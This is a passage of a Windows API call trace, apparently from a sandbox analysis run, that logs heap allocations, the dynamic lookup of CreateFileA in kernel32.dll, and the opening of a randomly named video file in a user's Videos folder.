(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0193.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0193.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0193.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0193.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0193.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0193.339] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0193.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0193.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0193.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0193.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0193.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0193.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0193.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0193.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0193.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0193.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0193.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0193.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0193.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0193.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.629] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0193.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd570 [0193.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd570, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0193.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.629] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0193.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0193.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0193.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd570, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0193.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.630] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0193.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0193.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0193.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0193.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0193.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", cchWideChar=64, lpMultiByteStr=0x8db138, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", lpUsedDefaultChar=0x0) returned 64 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0193.631] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\xhiatain2v.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0193.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0193.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0193.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0193.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0193.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=64, lpWideCharStr=0x9c0b78, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi") returned 64 [0193.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0193.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0193.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0193.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0193.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0193.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0193.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0193.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0193.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0193.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0193.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0193.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0193.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.634] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, 